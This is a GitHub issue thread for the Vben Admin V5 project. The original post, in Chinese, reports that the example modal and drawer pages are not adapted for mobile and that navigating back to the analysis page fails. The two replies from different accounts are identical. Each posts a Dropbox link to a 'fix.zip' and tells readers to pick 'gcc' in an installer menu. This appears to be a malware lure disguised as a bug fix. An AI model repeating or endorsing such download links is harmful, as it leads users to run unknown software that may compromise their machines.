### ISSUE TITLE
Bug: 示例 弹窗 抽屉 在移动端（手机）上没有适配；如有其他页面打开，分析页，永远无法点击返回到这个页面 bug

### ISSUE THREAD

**Issue by zusrsoft** [vbenjs/vue-vben-admin#4234]
### Version

Vben Admin V5

### Describe the bug?

**Bug: 示例 弹窗 抽屉 在移动端（手机）上没有适配，造成与已适配的主框架格格不入!**
**另外：在移动端（手机）上 ，如有其他页面打开，分析页，永远无法点击返回到这个页面 bug**

![弹窗1](https://github.com/user-attachments/assets/db21c6fc-306c-4979-87a0-82ead96e5418)
[弹窗2](https://github.com/user-attachments/assets/94079076-3eab-4cf6-8f3b-6b2edfbedb03)
![抽屉1](https://github.com/user-attachments/assets/3404b16e-9946-45aa-9c69-857dc8a09ef8)
![抽屉2](https://github.com/user-attachments/assets/a296d329-b2c0-487f-b3b4-528adb445219)
![a1111](https://github.com/user-attachments/assets/6f4efdf6-aa0d-4876-8dd8-a5350f2207d1)

### Reproduction

https://www.vben.pro/#/examples/modal
https://www.vben.pro/#/examples/drawer

### System Info

```shell
移动端 IOS 安卓
```

### Validations

- [X] Read the [docs](https://anncwb.github.io/vue-vben-admin-doc/)
- [X] Ensure the code is up to date. (Some issues have been fixed in the latest version)
- [X] I have searched the [existing issues](https://github.com/vbenjs/vue-vben-admin/issues) and checked that my issue does not duplicate any existing issues.
- [X] Check that this is a concrete bug. For Q&A open a [GitHub Discussion](https://github.com/vbenjs/vue-vben-admin/discussions) or join our [Discord Chat Server](https://discord.gg/8GuAdwDhj6).
- [X] The provided reproduction is a [minimal reproducible example](https://stackoverflow.com/help/minimal-reproducible-example) of the bug.

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
